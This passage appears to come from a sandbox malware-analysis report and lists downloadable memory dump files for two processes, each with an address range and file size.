4KB

Download
memory/2396-120-0x000001F988B00000-0x000001F988B01000-memory.dmp

Filesize
4KB

Download
memory/2396-119-0x000001F988AF0000-0x000001F988AF1000-memory.dmp

Filesize
4KB

Download
memory/2396-121-0x000001F988B10000-0x000001F988B11000-memory.dmp

Filesize
4KB

Download
memory/2396-127-0x000001F98AB50000-0x000001F98AB51000-memory.dmp

Filesize
4KB

Download
memory/2396-123-0x000001F98AAF0000-0x000001F98AAF1000-memory.dmp

Filesize
4KB

Download
memory/2396-122-0x000001F988B20000-0x000001F988B21000-memory.dmp

Filesize
4KB

Download
memory/2396-129-0x000001F98AB70000-0x000001F98AB71000-memory.dmp

Filesize
4KB

Download
memory/2400-130-0x00000275F3420000-0x00000275F3424000-memory.dmp

Filesize
16KB

Download